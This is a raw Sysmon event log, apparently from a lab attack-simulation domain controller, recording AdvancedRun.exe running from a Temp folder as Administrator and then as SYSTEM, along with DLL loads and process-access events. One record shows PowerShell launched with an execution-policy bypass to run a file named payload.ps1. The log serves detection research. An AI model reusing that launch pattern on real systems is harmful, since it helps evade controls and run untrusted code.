534500x80000000000000004081255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:18:02.352{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 734700x80000000000000004080643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.471{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=C5114D5A60467157B35D494D927325AB,SHA256=BE91B4149E5C074DE9055BF3914EF746F9776C2771BEA9E0336867A82A827C0DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14F5-61EB-A308-000000002702}5972C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2878|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1
\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004080620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.463{834264DD-14F5-61EB-A308-000000002702}5972C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "c:\users\Administrator\desktop\payload.ps1"C:\Windows\System32\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator 10341000x80000000000000004080606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:53.009{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:53.008{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:53.008{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004080581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.541{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\winsta.dll10.0.14393.0 (rs1_release.160715-1616)Winstation LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationwinsta.dllMD5=74261D485681A12AFF1AD517FD0EF200,SHA256=DEC3B7B1EBF3F7F4940FE63D665E2C50F6447C848C35C64B1BDE446E04358480trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 534500x80000000000000004080575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.544{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeNT AUTHORITY\SYSTEM 10341000x80000000000000004080574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.542{834264DD-DAE6-61EA-0D00-000000002702}8761012C:\Windows\system32\svchost.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000004080573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.532{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wtsapi32.dll10.0.14393.0 (rs1_release.160715-1616)Windows Remote Desktop Session Host Server SDK APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationwtsapi32.dllMD5=55D5450C85C0A0DE8F2A22F2C0C816AE,SHA256=3CF7B03BEB7C47157C47EACEBFB731096468D1D25FF6784485EFD2FB806C4C5EtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000004080572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.530{834264DD-14EF-61EB-A208-000000002702}37965672C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x10C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1bb7|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+98fa|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.529{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000004080570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.528{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT 
AUTHORITY\SYSTEM 734700x80000000000000004080569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.523{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.519{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.518{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.517{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 
(rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.517{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.516{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.515{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 
734700x80000000000000004080562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.515{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.514{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.513{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for 
SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 
734700x80000000000000004080555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080552Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 
(rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080550Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.509{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080549Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 
734700x80000000000000004080548Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000004080547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft 